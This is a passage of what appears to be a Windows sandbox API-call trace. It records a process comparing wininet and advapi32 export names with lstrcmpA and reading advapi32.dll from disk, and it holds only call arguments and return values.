lpString2="AppCacheDeleteGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0100.363] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0100.364] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0100.364] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0100.365] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0100.366] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0100.367] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0100.367] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0100.368] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0100.368] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0100.369] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0100.370] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0100.370] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0100.371] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0100.371] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0100.371] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0100.371] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0100.371] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0100.371] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0100.572] GetProcessHeap () returned 0x4f0000 [0100.572] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x40b4040 | out: hHeap=0x4f0000) returned 1 [0100.584] GetProcessHeap () returned 0x4f0000 [0100.584] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509010 [0100.585] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0100.585] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0100.585] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0100.585] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0100.585] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0100.586] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0100.586] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0100.586] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0100.586] GetProcessHeap () returned 0x4f0000 [0100.586] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa3ef0) returned 0x2cf2010 [0100.588] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0100.588] ReadFile (in: hFile=0x140, lpBuffer=0x2cf2010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf2010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0100.596] CloseHandle (hObject=0x140) returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0100.596] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0100.596] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0100.596] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 